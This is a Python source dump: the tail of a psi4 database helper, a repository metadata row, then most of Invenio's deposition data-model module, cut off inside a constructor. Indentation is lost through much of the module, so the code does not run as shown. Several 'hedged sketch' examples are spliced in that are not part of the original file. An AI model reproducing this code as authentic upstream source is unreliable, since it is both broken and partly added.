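# databases directory sits next to this file, as the glob in
# dictify_database_docstrings() expects.
def _print_database_summaries():
    docs = dictify_database_docstrings()
    for name in sorted(docs):
        general = docs[name]['general']
        first_line = general[0] if general else ''
        print('  %-12s %s' % ('[' + name + ']', first_line))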
| ashutoshvt/psi4 | psi4/driver/qcdb/dbproc.py | Python | lgpl-3.0 | 3,856 | ["Psi4"] | cacfd102d9c2a3e5610df5b28ea682495765f62cef497d2029555140c244470a |
|
# -*- coding: utf-8 -*-
##
## This file is part of Invenio.
## Copyright (C) 2013, 2014 CERN.
##
## Invenio is free software; you can redistribute it and/or
## modify it under the terms of the GNU General Public License as
## published by the Free Software Foundation; either version 2 of the
## License, or (at your option) any later version.
##
## Invenio is distributed in the hope that it will be useful, but
## WITHOUT ANY WARRANTY; without even the implied warranty of
## MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
## General Public License for more details.
##
## You should have received a copy of the GNU General Public License
## along with Invenio; if not, write to the Free Software Foundation, Inc.,
## 59 Temple Place, Suite 330, Boston, MA 02111-1307, USA.
"""Deposition data model classes.
Classes for wrapping BibWorkflowObject and friends to make it easier to
work with the data attributes.
"""
from uuid import uuid4
import json
import os
from datetime import datetime
from dateutil.tz import tzutc
from sqlalchemy.orm.exc import NoResultFound
from werkzeug.datastructures import MultiDict
from werkzeug.utils import secure_filename
from flask import redirect, render_template, flash, url_for, request, \
session, current_app
from flask.ext.login import current_user
from flask.ext.restful import fields, marshal
from invenio.ext.restful import UTCISODateTime
from invenio.base.helpers import unicodifier
from invenio.ext.sqlalchemy import db
from invenio.modules.workflows.models import BibWorkflowObject, Workflow, \
ObjectVersion
from invenio.modules.workflows.engine import WorkflowStatus
from .form import CFG_FIELD_FLAGS, DataExporter
from .signals import file_uploaded
from .storage import Storage, DepositionStorage
#
# Exceptions
#
class DepositionError(Exception):
"""Base class for deposition errors."""
pass
class InvalidDepositionType(DepositionError):
"""Raise when a deposition type cannot be found."""
pass
class InvalidDepositionAction(DepositionError):
"""Raise when deposition is in an invalid state for action."""
pass
class DepositionDoesNotExists(DepositionError):
    """Raise when a deposition does not exist."""
    pass
class DraftDoesNotExists(DepositionError):
    """Raise when a draft does not exist."""
    pass
class FormDoesNotExists(DepositionError):
    """Raise when a form does not exist."""
    pass
class FileDoesNotExists(DepositionError):
    """Raise when a file does not exist."""
    pass
class DepositionNotDeletable(DepositionError):
"""Raise when a deposition cannot be deleted."""
pass
class FilenameAlreadyExists(DepositionError):
"""Raise when an identical filename is already present in a deposition."""
pass
class ForbiddenAction(DepositionError):
"""Raise when action on a deposition, draft or file is not authorized."""
pass
class InvalidApiAction(DepositionError):
"""Raise when an invalid API action is requested."""
pass
#
# Helpers
#
class FactoryMixin(object):
"""Mix-in class to help create objects from persisted object state."""
@classmethod
def factory(cls, state, *args, **kwargs):
obj = cls(*args, **kwargs)
obj.__setstate__(state)
return obj
#
# Primary classes
#
class DepositionType(object):
"""
A base class for the deposition types to ensure certain
properties are defined on each type.
A deposition type is just a BibWorkflow with a couple of extra methods.
To customize rendering behavior of the workflow for a given deposition type
you can override the render_error(), render_step() and render_completed()
methods.
"""
workflow = []
""" Workflow definition """
name = ""
""" Display name for this deposition type """
name_plural = ""
""" Plural version of display name for this deposition type """
enabled = False
""" Determines if type is enabled - TODO: REMOVE"""
default = False
"""
    Determines if type is the default - warnings are issued if conflicts exist.
TODO: remove
"""
deletable = False
"""
Determine if a deposition is deletable after submission.
"""
editable = False
"""
Determine if a deposition is editable after submission.
"""
stopable = False
"""
Determine if a deposition workflow can be stopped (i.e. discard changes).
"""
group = None
""" Name of group to include this type in. """
api = False
"""
Determines if API is enabled for this type (requires workflow to be
compatible with the API).
"""
draft_definitions = {'_default': None}
"""
Dictionary of all drafts for this deposition type
"""
marshal_file_fields = dict(
checksum=fields.String,
filename=fields.String(attribute='name'),
id=fields.String(attribute='uuid'),
filesize=fields.String(attribute='size'),
)
""" REST API structure of a file """
marshal_draft_fields = dict(
metadata=fields.Raw(attribute='values'),
completed=fields.Boolean,
id=fields.String,
)
""" REST API structure of a draft """
marshal_deposition_fields = dict(
id=fields.Integer,
title=fields.String,
created=UTCISODateTime,
modified=UTCISODateTime,
owner=fields.Integer(attribute='user_id'),
state=fields.String,
submitted=fields.Boolean,
files=fields.Nested(marshal_file_fields),
drafts=fields.Nested(marshal_draft_fields, attribute='drafts_list'),
)
""" REST API structure of a deposition """
@classmethod
def default_draft_id(cls, deposition):
return '_default'
@classmethod
def render_error(cls, dummy_deposition):
"""
        Render a page when the deposition workflow raised an error.
Method can be overwritten by subclasses to provide custom
user interface.
"""
        flash('%(name)s deposition has returned an error.' %
{'name': cls.name}, 'error')
return redirect(url_for('.index'))
@classmethod
    def render_step(cls, deposition):
"""
Render a page for a given deposition step.
Method can be overwritten by subclasses to provide custom
user interface.
"""
ctx = deposition.get_render_context()
if ctx:
return render_template(**ctx)
else:
return render_template('deposit/error.html', **dict(
depostion=deposition,
deposition_type=(
None if deposition.type.is_default()
else deposition.type.get_identifier()
),
uuid=deposition.id,
my_depositions=Deposition.get_depositions(
current_user, type=deposition.type
),
))
@classmethod
def render_completed(cls, dummy_deposition):
"""
        Render page when deposition was successfully completed (i.e. the workflow
just finished successfully).
Method can be overwritten by subclasses to provide custom
user interface.
"""
flash('%(name)s was successfully finished.' %
{'name': cls.name}, 'success')
return redirect(url_for('.index'))
@classmethod
def render_final(cls, deposition):
"""
        Render page when deposition was *already* successfully completed (i.e.
a finished workflow is being executed a second time).
This allows you render e.g. a preview of the record. The distinction
between render_completed and render_final is primarily useful for the
REST API (see api_final and api_completed)
Method can be overwritten by subclasses to provide custom
user interface.
"""
return cls.render_completed(deposition)
@classmethod
def api_completed(cls, deposition):
"""
        Workflow just finished processing, so return a 202 Accepted, since
usually further background processing may happen.
"""
return deposition.marshal(), 202
@classmethod
def api_final(cls, deposition):
"""
Workflow already finished, and the user tries to re-execute the
workflow, so send a 400 Bad Request back.
"""
return dict(
message="Deposition workflow already completed",
status=400,
), 400
@classmethod
def api_step(cls, deposition):
"""
Workflow was halted during processing. The workflow task that halted
processing is expected to provide a response to send back to the
client.
The default response code is 500 Internal Server Error. A workflow task
is expected to use Deposition.set_render_context() with a dictionary
which is returned to the client. Set the key 'status', to change the
status code, e.g.::
d.set_render_context(dict(status=400, message="Bad request"))
If no response is provided by the workflow task, it is regarded as
an internal server error.
"""
ctx = deposition.get_render_context()
if ctx:
return ctx.get('response', {}), ctx.get('status', 500)
return cls.api_error(deposition)
@classmethod
def api_error(cls, deposition):
return dict(message='Internal Server Error', status=500), 500
@classmethod
def api_action(cls, deposition, action_id):
if action_id == 'run':
return deposition.run_workflow(headless=True)
elif action_id == 'reinitialize':
deposition.reinitialize_workflow()
return deposition.run_workflow(headless=True)
elif action_id == 'stop':
deposition.stop_workflow()
return deposition.run_workflow(headless=True)
raise InvalidApiAction(action_id)
@classmethod
def api_metadata_schema(cls, draft_id):
"""
Get the input validation schema for this draft_id
Allows you to override API defaults.
"""
from wtforms.fields.core import FieldList, FormField
if draft_id in cls.draft_definitions:
schema = dict()
formclass = cls.draft_definitions[draft_id]
for fname, fclass in formclass()._fields.items():
if isinstance(fclass, FieldList):
schema[fname] = dict(type='list')
elif isinstance(fclass, FormField):
schema[fname] = dict(type='dict')
else:
schema[fname] = dict(type='any')
return dict(type='dict', schema=schema)
return None
@classmethod
def marshal_deposition(cls, obj):
"""
Generate a JSON representation for REST API of a Deposition
"""
return marshal(obj, cls.marshal_deposition_fields)
@classmethod
def marshal_draft(cls, obj):
"""
Generate a JSON representation for REST API of a DepositionDraft
"""
return marshal(obj, cls.marshal_draft_fields)
@classmethod
def marshal_file(cls, obj):
"""
Generate a JSON representation for REST API of a DepositionFile
"""
return marshal(obj, cls.marshal_file_fields)
@classmethod
def authorize(cls, deposition, action):
if action == 'create':
return True # Any authenticated user
elif action == 'delete':
if deposition.has_sip():
return deposition.type.deletable
return True
elif action == 'reinitialize':
return deposition.type.editable
elif action == 'stop':
return deposition.type.stopable
elif action in ['add_file', 'remove_file', 'sort_files']:
# Don't allow to add/remove/sort files after first submission
return not deposition.has_sip()
elif action in ['add_draft', ]:
            # Allow adding drafts while in progress (independent of whether a
            # SIP exists or not).
return deposition.state == 'inprogress'
else:
return not deposition.has_sip()
@classmethod
def authorize_draft(cls, deposition, draft, action):
if action == 'update':
# If deposition allows adding a draft, then allow editing the
# draft.
return cls.authorize(deposition, 'add_draft')
return cls.authorize(deposition, 'add_draft')
@classmethod
def authorize_file(cls, deposition, deposition_file, action):
return cls.authorize(deposition, 'add_file')
@classmethod
def get_identifier(cls):
""" Get type identifier (identical to workflow name) """
return cls.__name__
@classmethod
def is_enabled(cls):
""" Check if workflow is enabled """
# Wrapping in a method to eventually allow enabling/disabling
# via configuration.
return cls.enabled
@classmethod
def is_default(cls):
""" Check if workflow is the default """
# Wrapping in a method to eventually allow configuration
# via configuration.
return cls.default
@classmethod
def run_workflow(cls, deposition):
"""
Run workflow for the given BibWorkflowObject.
Usually not invoked directly, but instead indirectly through
Deposition.run_workflow().
"""
if deposition.workflow_object.workflow is None or (
deposition.workflow_object.version == ObjectVersion.INITIAL
and
deposition.workflow_object.workflow.status ==
WorkflowStatus.NEW):
return deposition.workflow_object.start_workflow(
workflow_name=cls.get_identifier(),
id_user=deposition.workflow_object.id_user,
module_name="webdeposit"
)
else:
return deposition.workflow_object.continue_workflow(
start_point="restart_task",
)
@classmethod
def reinitialize_workflow(cls, deposition):
# Only reinitialize if really needed (i.e. you can only
# reinitialize a fully completed workflow).
wo = deposition.workflow_object
if wo.version == ObjectVersion.COMPLETED and \
wo.workflow.status == WorkflowStatus.COMPLETED:
wo.version = ObjectVersion.INITIAL
wo.workflow.status = WorkflowStatus.NEW
# Clear deposition drafts
deposition.drafts = {}
@classmethod
def stop_workflow(cls, deposition):
# Only stop workflow if really needed
wo = deposition.workflow_object
if wo.version != ObjectVersion.COMPLETED and \
wo.workflow.status != WorkflowStatus.COMPLETED:
            # Only workflows which have been fully completed once before
            # can be stopped.
if deposition.has_sip():
wo.version = ObjectVersion.COMPLETED
wo.workflow.status = WorkflowStatus.COMPLETED
# Clear all drafts
deposition.drafts = {}
# Set title - FIXME: find better way to set title
sip = deposition.get_latest_sip(sealed=True)
title = sip.metadata.get('title', 'Untitled')
deposition.title = title
@classmethod
def all(cls):
""" Get a dictionary of deposition types """
from .registry import deposit_types
return deposit_types.mapping()
@classmethod
def get(cls, identifier):
try:
return cls.all()[identifier]
except KeyError:
raise InvalidDepositionType(identifier)
@classmethod
def keys(cls):
""" Get a list of deposition type names """
return cls.all().keys()
@classmethod
def values(cls):
""" Get a list of deposition type names """
return cls.all().values()
@classmethod
def get_default(cls):
""" Get a list of deposition type names """
from .registry import deposit_default_type
return deposit_default_type.get()
def __unicode__(self):
""" Return a name for this class """
return self.get_identifier()
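# Hedged sketch (not part of the original module): a minimal custom deposition
# type. The draft form class and workflow tasks are placeholders only; a real
# type would point draft_definitions at a WTForms-based form class and
# workflow at a list of BibWorkflow tasks.
class SimpleRecordDeposition(DepositionType):
    name = "Simple record"
    name_plural = "Simple records"
    enabled = True
    draft_definitions = {'_default': None}  # placeholder form class
    workflow = []                            # placeholder workflow tasks

    @classmethod
    def render_completed(cls, deposition):
        flash('%(name)s was submitted.' % {'name': cls.name}, 'success')
        return redirect(url_for('.index'))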
class DepositionFile(FactoryMixin):
"""
Represents an uploaded file
Creating a normal deposition file::
uploaded_file = request.files['file']
filename = secure_filename(uploaded_file.filename)
backend = DepositionStorage(deposition_id)
d = DepositionFile(backend=backend)
d.save(uploaded_file, filename)
Creating a chunked deposition file::
uploaded_file = request.files['file']
filename = secure_filename(uploaded_file.filename)
chunk = request.files['chunk']
chunks = request.files['chunks']
backend = ChunkedDepositionStorage(deposition_id)
d = DepositionFile(id=file_id, backend=backend)
d.save(uploaded_file, filename, chunk, chunks)
if chunk == chunks:
d.save(finish=True, filename=filename)
Reading a file::
d = DepositionFile.from_json(data)
if d.is_local():
send_file(d.get_syspath())
else:
redirect(d.get_url())
d.delete()
Deleting a file::
d = DepositionFile.from_json(data)
d.delete()
"""
def __init__(self, uuid=None, backend=None):
self.uuid = uuid or str(uuid4())
self._backend = backend
self.name = ''
def __getstate__(self):
# TODO: Add content_type attributes
return dict(
id=self.uuid,
path=self.path,
name=self.name,
size=self.size,
checksum=self.checksum,
#bibdoc=self.bibdoc
)
def __setstate__(self, state):
self.uuid = state['id']
self._path = state['path']
self.name = state['name']
self.size = state['size']
self.checksum = state['checksum']
def __repr__(self):
data = self.__getstate__()
del data['path']
return json.dumps(data)
@property
def backend(self):
if not self._backend:
self._backend = Storage(None)
return self._backend
@property
def path(self):
if self._path is None:
raise Exception("No path set")
return self._path
def save(self, incoming_file, filename=None, *args, **kwargs):
self.name = secure_filename(filename or incoming_file.filename)
(self._path, self.size, self.checksum, result) = self.backend.save(
incoming_file, filename, *args, **kwargs
)
return result
def delete(self):
""" Delete the file on storage """
return self.backend.delete(self.path)
def is_local(self):
""" Determine if file is a local file """
return self.backend.is_local(self.path)
def get_url(self):
""" Get a URL for the file """
return self.backend.get_url(self.path)
def get_syspath(self):
""" Get a local system path to the file """
return self.backend.get_syspath(self.path)
class DepositionDraftCacheManager(object):
"""
Draft cache manager takes care of storing draft values in the cache prior
to a workflow being run. The data can be loaded by the prefill_draft()
workflow task.
"""
def __init__(self, user_id):
self.user_id = user_id
self.data = {}
@classmethod
def from_request(cls):
"""
Create a new draft cache from the current request.
"""
obj = cls(current_user.get_id())
# First check if we can get it via a json
data = request.get_json(silent=True)
if not data:
            # If not, simply merge both query parameters and request body
            # parameters.
data = request.values.to_dict()
obj.data = data
return obj
@classmethod
def get(cls):
obj = cls(current_user.get_id())
obj.load()
return obj
def save(self):
""" Save data to session """
if self.has_data():
session['deposit_prefill'] = self.data
session.modified = True
else:
self.delete()
def load(self):
""" Load data from session """
self.data = session.get('deposit_prefill', {})
def delete(self):
""" Delete data in session """
if 'deposit_prefill' in session:
del session['deposit_prefill']
session.modified = True
def has_data(self):
"""
Determine if the cache has data.
"""
return bool(self.data)
def fill_draft(self, deposition, draft_id, clear=True):
"""
Fill a draft with cached draft values
"""
draft = deposition.get_or_create_draft(draft_id)
draft.process(self.data)
if clear:
self.data = {}
self.delete()
return draft
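# Hedged sketch (not part of the original module): the typical request-time
# flow. Must run inside a Flask request/session context; '_default' is the
# conventional draft id used elsewhere in this module.
def _prefill_from_request(deposition):
    cache = DepositionDraftCacheManager.from_request()
    cache.save()                      # stash the incoming values in the session
    cache = DepositionDraftCacheManager.get()
    if cache.has_data():
        cache.fill_draft(deposition, '_default')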
class DepositionDraft(FactoryMixin):
"""
Represents the state of a form
"""
def __init__(self, draft_id, form_class=None, deposition_ref=None):
self.id = draft_id
self.completed = False
self.form_class = form_class
self.values = {}
self.flags = {}
self._form = None
# Back reference to the depositions
self._deposition_ref = deposition_ref
self.validate = False
def __getstate__(self):
return dict(
completed=self.completed,
values=self.values,
flags=self.flags,
validate=self.validate,
)
def __setstate__(self, state):
self.completed = state['completed']
self.form_class = None
if self._deposition_ref:
self.form_class = self._deposition_ref.type.draft_definitions.get(
self.id
)
self.values = state['values']
self.flags = state['flags']
self.validate = state.get('validate', True)
def is_completed(self):
return self.completed
def has_form(self):
return self.form_class is not None
def authorize(self, action):
if not self._deposition_ref:
return True # Not connected to deposition so authorize anything.
return self._deposition_ref.type.authorize_draft(
self._deposition_ref, self, action
)
def complete(self):
"""
Set state of draft to completed.
"""
self.completed = True
def update(self, form):
"""
Update draft values and flags with data from form.
"""
data = dict((key, value) for key, value in form.data.items()
if value is not None)
self.values = data
self.flags = form.get_flags()
def process(self, data, complete_form=False):
"""
Process, validate and store incoming form data and return response.
"""
if not self.authorize('update'):
raise ForbiddenAction('update', self)
if not self.has_form():
raise FormDoesNotExists(self.id)
# The form is initialized with form and draft data. The original
# draft_data is accessible in Field.object_data, Field.raw_data is the
# new form data and Field.data is the processed form data or the
# original draft data.
#
        # Behind the scenes, Form.process() is called, which in turn calls
# Field.process_data(), Field.process_formdata() and any filters
# defined.
#
# Field.object_data contains the value of process_data(), while
# Field.data contains the value of process_formdata() and any filters
# applied.
form = self.get_form(formdata=data)
        # Run form validation which will call Field.pre_validate(),
# Field.validators, Form.validate_<field>() and Field.post_validate().
# Afterwards Field.data has been validated and any errors will be
# present in Field.errors.
validated = form.validate()
# Call Form.run_processors() which in turn will call
# Field.run_processors() that allow fields to set flags (hide/show)
# and values of other fields after the entire formdata has been
# processed and validated.
validated_flags, validated_data, validated_msgs = (
form.get_flags(), form.data, form.messages
)
form.post_process(formfields=[] if complete_form else data.keys())
post_processed_flags, post_processed_data, post_processed_msgs = (
form.get_flags(), form.data, form.messages
)
# Save form values
self.update(form)
# Build result dictionary
process_field_names = None if complete_form else data.keys()
# Determine if some fields where changed during post-processing.
changed_values = dict(
(name, value) for name, value in post_processed_data.items()
if validated_data[name] != value
)
# Determine changed flags
changed_flags = dict(
(name, flags) for name, flags in post_processed_flags.items()
if validated_flags.get(name, []) != flags
)
# Determine changed messages
changed_msgs = dict(
(name, messages) for name, messages in post_processed_msgs.items()
if validated_msgs.get(name, []) != messages
or process_field_names is None or name in process_field_names
)
result = {}
if changed_msgs:
result['messages'] = changed_msgs
if changed_values:
result['values'] = changed_values
if changed_flags:
for flag in CFG_FIELD_FLAGS:
fields = [
(name, flag in field_flags)
for name, field_flags in changed_flags.items()
]
result[flag + '_on'] = map(
lambda x: x[0], filter(lambda x: x[1], fields)
)
result[flag + '_off'] = map(
lambda x: x[0], filter(lambda x: not x[1], fields)
)
return form, validated, result
def get_form(self, formdata=None, load_draft=True,
validate_draft=False):
"""
Create form instance with draft data and form data if provided.
:param formdata: Incoming form data.
:param files: Files to ingest into form
:param load_draft: True to initialize form with draft data.
:param validate_draft: Set to true to validate draft data, when no form
data is provided.
"""
if not self.has_form():
raise FormDoesNotExists(self.id)
# If a field is not present in formdata, Form.process() will assume it
# is blank instead of using the draft_data value. Most of the time we
# are only submitting a single field in JSON via AJAX requests. We
# therefore reset non-submitted fields to the draft_data value with
# form.reset_field_data().
# WTForms deal with unicode - we deal with UTF8 so convert all
draft_data = unicodifier(self.values) if load_draft else {}
formdata = MultiDict(formdata or {})
form = self.form_class(
formdata=formdata, **draft_data
)
if formdata:
form.reset_field_data(exclude=formdata.keys())
# Set field flags
if load_draft and self.flags:
form.set_flags(self.flags)
# Ingest files in form
if self._deposition_ref:
form.files = self._deposition_ref.files
else:
form.files = []
if validate_draft and draft_data and formdata is None:
form.validate()
return form
@classmethod
def merge_data(cls, drafts):
"""
Merge data of multiple drafts
Duplicate keys will be overwritten without warning.
"""
data = {}
# Don't include *) disabled fields, and *) empty optional fields
func = lambda f: not f.flags.disabled and (f.flags.required or f.data)
for d in drafts:
if d.has_form():
visitor = DataExporter(
filter_func=func
)
visitor.visit(d.get_form())
data.update(visitor.data)
else:
data.update(d.values)
return data
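# Hedged sketch (not part of the original module): drafts without a form class
# fall back to their raw values dict in merge_data(), so plain dicts are enough
# to see the duplicate-key overwrite behaviour described above.
def _merge_data_example():
    d1 = DepositionDraft('step1')
    d1.values = {'title': 'My dataset', 'year': 2014}
    d2 = DepositionDraft('step2')
    d2.values = {'year': 2015, 'license': 'CC-BY'}
    # Later drafts win on duplicate keys:
    # {'title': 'My dataset', 'year': 2015, 'license': 'CC-BY'}
    return DepositionDraft.merge_data([d1, d2])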
class Deposition(object):
"""
Wraps a BibWorkflowObject
Basically an interface to work with BibWorkflowObject data attribute in an
easy manner.
"""
def __init__(self, workflow_object, type=None, user_id=None):
self.workflow_object = workflow_object
if not workflow_object:
self.files = []
self.drafts = {}
self.type = self.get_type(type)
self.title = ''
self.sips = []
self.workflow_object = BibWorkflowObject.create_object(
id_user=user_id,
)
# Ensure default data is set for all objects.
self.update()
else:
self.__setstate__(workflow_object.get_data())
self.engine = None
#
# Properties proxies to BibWorkflowObject
#
@property
def id(self):
return self.workflow_object.id
@property
def user_id(self):
return self.workflow_object.id_user
@user_id.setter
def user_id(self, value):
self.workflow_object.id_user = value
self.workflow_object.workflow.id_user = value
@property
def created(self):
return self.workflow_object.created
@property
def modified(self):
return self.workflow_object.modified
@property
def drafts_list(self):
# Needed for easy marshaling by API
return self.drafts.values()
#
# Proxy methods
#
def authorize(self, action):
"""
Determine if certain action is authorized
Delegated to deposition type to allow overwriting default behavior.
"""
return self.type.authorize(self, action)
#
# Serialization related methods
#
def marshal(self):
"""
API representation of an object.
Delegated to the DepositionType, to allow overwriting default
behaviour.
"""
return self.type.marshal_deposition(self)
def __getstate__(self):
"""
Serialize deposition state for storing in the BibWorkflowObject
"""
# The bibworkflow object id and owner is implicit, as the Deposition
# object only wraps the data attribute of a BibWorkflowObject.
# FIXME: Find better solution for setting the title.
for d in self.drafts.values():
if 'title' in d.values:
self.title = d.values['title']
break
return dict(
type=self.type.get_identifier(),
title=self.title,
files=[f.__getstate__() for f in self.files],
drafts=dict(
[(d_id, d.__getstate__()) for d_id, d in self.drafts.items()]
),
sips=[f.__getstate__() for f in self.sips],
)
def __setstate__(self, state):
"""
Deserialize deposition from state stored in BibWorkflowObject
"""
self.type = DepositionType.get(state['type'])
self.title = state['title']
self.files = [
DepositionFile.factory(
f_state,
uuid=f_state['id'],
backend=DepositionStorage(self.id),
)
for f_state in state['files']
]
self.drafts = dict(
[(d_id, DepositionDraft.factory(d_state, d_id,
deposition_ref=self))
for d_id, d_state in state['drafts'].items()]
)
self.sips = [
SubmissionInformationPackage.factory(s_state, uuid=s_state['id'])
for s_state in state.get('sips', [])
]
#
# Persistence related methods
#
def update(self):
"""
Update workflow object with latest data.
"""
data = self.__getstate__()
        # BibWorkflow calls get_data() before executing any workflow task,
        # and calls set_data() after. Hence, unless we update the data
# attribute it will be overwritten.
try:
self.workflow_object.data = data
except AttributeError:
pass
self.workflow_object.set_data(data)
def reload(self):
"""
Get latest data from workflow object
"""
self.__setstate__(self.workflow_object.get_data())
def save(self):
"""
Save the state of the deposition.
Uses the __getstate__ method to make a JSON serializable
representation which, sets this as data on the workflow object
and saves it.
"""
self.update()
self.workflow_object.save()
def delete(self):
"""
Delete the current deposition
"""
if not self.authorize('delete'):
raise DepositionNotDeletable(self)
for f in self.files:
f.delete()
if self.workflow_object.id_workflow != '':
if self.workflow_object.id_workflow:
Workflow.delete(uuid=self.workflow_object.id_workflow)
BibWorkflowObject.query.filter_by(
id_workflow=self.workflow_object.id_workflow
).delete()
else:
db.session.remove(self.workflow_object)
db.session.commit()
#
# Workflow execution
#
def run_workflow(self, headless=False):
"""
Execute the underlying workflow
If you made modifications to the deposition you must save if before
running the workflow, using the save() method.
"""
if self.workflow_object.workflow is not None:
current_status = self.workflow_object.workflow.status
if current_status == WorkflowStatus.COMPLETED:
return self.type.api_final(self) if headless \
else self.type.render_final(self)
self.update()
self.engine = self.type.run_workflow(self)
self.reload()
status = self.engine.status
if status == WorkflowStatus.ERROR:
return self.type.api_error(self) if headless else \
self.type.render_error(self)
elif status != WorkflowStatus.COMPLETED:
return self.type.api_step(self) if headless else \
self.type.render_step(self)
elif status == WorkflowStatus.COMPLETED:
return self.type.api_completed(self) if headless else \
self.type.render_completed(self)
def reinitialize_workflow(self):
"""
Reinitialize a workflow object (i.e. prepare it for editing)
"""
if self.state != 'done':
raise InvalidDepositionAction("Action only allowed for "
"depositions in state 'done'.")
if not self.authorize('reinitialize'):
raise ForbiddenAction('reinitialize', self)
self.type.reinitialize_workflow(self)
def stop_workflow(self):
"""
Stop a running workflow object (e.g. discard changes while editing).
"""
if self.state != 'inprogress' or not self.submitted:
raise InvalidDepositionAction("Action only allowed for "
"depositions in state 'inprogress'.")
if not self.authorize('stop'):
raise ForbiddenAction('stop', self)
self.type.stop_workflow(self)
def set_render_context(self, ctx):
"""
Set rendering context - used in workflow tasks to set what is to be
rendered (either by API or UI)
"""
self.workflow_object.deposition_context = ctx
def get_render_context(self):
"""
Get rendering context - used by DepositionType.render_step/api_step
"""
return getattr(self.workflow_object, 'deposition_context', {})
@property
def state(self):
"""
Return simplified workflow state - inprogress, done or error
"""
try:
status = self.workflow_object.workflow.status
if status == WorkflowStatus.ERROR:
return "error"
elif status == WorkflowStatus.COMPLETED:
return "done"
except AttributeError:
pass
return "inprogress"
#
# Draft related methods
#
def get_draft(self, draft_id):
"""
Get draft
"""
if draft_id not in self.drafts:
raise DraftDoesNotExists(draft_id)
return self.drafts[draft_id]
def get_or_create_draft(self, draft_id):
"""
Get or create a draft for given draft_id
"""
if draft_id not in self.drafts:
if draft_id not in self.type.draft_definitions:
raise DraftDoesNotExists(draft_id)
if not self.authorize('add_draft'):
raise ForbiddenAction('add_draft', self)
self.drafts[draft_id] = DepositionDraft(
draft_id,
form_class=self.type.draft_definitions[draft_id],
deposition_ref=self,
)
return self.drafts[draft_id]
def get_default_draft_id(self):
"""
Get the default draft id for this deposition.
"""
return self.type.default_draft_id(self)
#
# Submission information package related methods
#
def get_latest_sip(self, sealed=None):
"""
Get the latest submission information package
:param sealed: Set to true to only returned latest sealed SIP. Set to
False to only return latest unsealed SIP.
"""
if len(self.sips) > 0:
for sip in reversed(self.sips):
if sealed is None:
return sip
elif sealed and sip.is_sealed():
return sip
elif not sealed and not sip.is_sealed():
return sip
return None
def create_sip(self):
"""
Create a new submission information package (SIP) with metadata from
the drafts.
"""
metadata = DepositionDraft.merge_data(self.drafts.values())
metadata['files'] = map(
lambda x: dict(path=x.path, name=os.path.splitext(x.name)[0]),
self.files
)
sip = SubmissionInformationPackage(metadata=metadata)
self.sips.append(sip)
return sip
def has_sip(self, sealed=True):
"""
Determine if deposition has a sealed submission information package.
"""
for sip in self.sips:
if (sip.is_sealed() and sealed) or \
(not sealed and not sip.is_sealed()):
return True
return False
@property
def submitted(self):
return self.has_sip()
#
# File related methods
#
def get_file(self, file_id):
for f in self.files:
if f.uuid == file_id:
return f
return None
def add_file(self, deposition_file):
if not self.authorize('add_file'):
raise ForbiddenAction('add_file', self)
for f in self.files:
if f.name == deposition_file.name:
raise FilenameAlreadyExists(deposition_file.name)
self.files.append(deposition_file)
file_uploaded.send(
self.type.get_identifier(),
deposition=self,
deposition_file=deposition_file,
)
def remove_file(self, file_id):
if not self.authorize('remove_file'):
raise ForbiddenAction('remove_file', self)
idx = None
for i, f in enumerate(self.files):
if f.uuid == file_id:
idx = i
if idx is not None:
return self.files.pop(idx)
return None
def sort_files(self, file_id_list):
"""
Order the files according the list of ids provided to this function.
"""
if not self.authorize('sort_files'):
raise ForbiddenAction('sort_files', self)
search_dict = dict(
[(f, i) for i, f in enumerate(file_id_list)]
)
def _sort_files_cmp(f_x, f_y):
i_x = search_dict.get(f_x.uuid, None)
i_y = search_dict.get(f_y.uuid, None)
if i_x == i_y:
return 0
elif i_x is None or i_x > i_y:
return 1
elif i_y is None or i_x < i_y:
return -1
self.files = sorted(self.files, _sort_files_cmp)
#
# Class methods
#
@classmethod
def get_type(self, type_or_id):
if type_or_id and isinstance(type_or_id, type) and \
issubclass(type_or_id, DepositionType):
return type_or_id
else:
return DepositionType.get(type_or_id) if type_or_id else \
DepositionType.get_default()
@classmethod
def create(cls, user, type=None):
"""
Create a new deposition object.
To persist the deposition, you must call save() on the created object.
If no type is defined, the default deposition type will be assigned.
@param user: The owner of the deposition
@param type: Deposition type identifier.
"""
t = cls.get_type(type)
if not t.authorize(None, 'create'):
raise ForbiddenAction('create')
# Note: it is correct to pass 'type' and not 't' below to constructor.
obj = cls(None, type=type, user_id=user.get_id())
return obj
@classmethod
def get(cls, object_id, user=None, type=None):
"""
Get the deposition with specified object id.
@param object_id: The BibWorkflowObject id.
@param user: Owner of the BibWorkflowObject
@param type: Deposition type identifier.
"""
if type:
type = DepositionType.get(type)
try:
workflow_object = BibWorkflowObject.query.filter(
BibWorkflowObject.id == object_id,
# id_user!=0 means current version, as opposed to some snapshot
# version.
BibWorkflowObject.id_user != 0,
).one()
except NoResultFound:
raise DepositionDoesNotExists(object_id)
if user and workflow_object.id_user != user.get_id():
raise DepositionDoesNotExists(object_id)
obj = cls(workflow_object)
if type and obj.type != type:
raise DepositionDoesNotExists(object_id, type)
return obj
@classmethod
def get_depositions(cls, user=None, type=None):
params = [
Workflow.module_name == 'webdeposit',
]
if user:
params.append(BibWorkflowObject.id_user == user.get_id())
else:
params.append(BibWorkflowObject.id_user != 0)
if type:
params.append(Workflow.name == type.get_identifier())
objects = BibWorkflowObject.query.join("workflow").options(
db.contains_eager('workflow')).filter(*params).order_by(
BibWorkflowObject.modified.desc()).all()
def _create_obj(o):
try:
obj = cls(o)
except InvalidDepositionType as err:
current_app.logger.exception(err)
return None
if type is None or obj.type == type:
return obj
return None
return filter(lambda x: x is not None, map(_create_obj, objects))
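# Hedged sketch (not part of the original module): the typical life cycle of a
# deposition using only methods defined above. Assumes a logged-in Flask-Login
# user and a default deposition type whose '_default' draft has a form class.
def _submit_default_deposition():
    d = Deposition.create(current_user)            # new, unsaved deposition
    draft = d.get_or_create_draft(d.get_default_draft_id())
    draft.process({'title': 'My first upload'})    # validate + store form data
    d.save()                                       # persist to BibWorkflowObject
    return d.run_workflow()                        # render step/completed page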
class SubmissionInformationPackage(FactoryMixin):
"""Submission information package (SIP).
:param uuid: Unique identifier for this SIP
:param metadata: Metadata in JSON for this submission information package
:param package: Full generated metadata for this package (i.e. normally
MARC for records, but could anything).
:param timestamp: UTC timestamp in ISO8601 format of when package was
sealed.
:param agents: List of agents for this package (e.g. creator, ...)
:param task_ids: List of task ids submitted to ingest this package (may be
appended to after SIP has been sealed).
"""
    def __init__(self, uuid=None, metadata=None):
        self.uuid = uuid or str(uuid4())
        # Avoid a shared mutable default argument; fall back to a fresh dict.
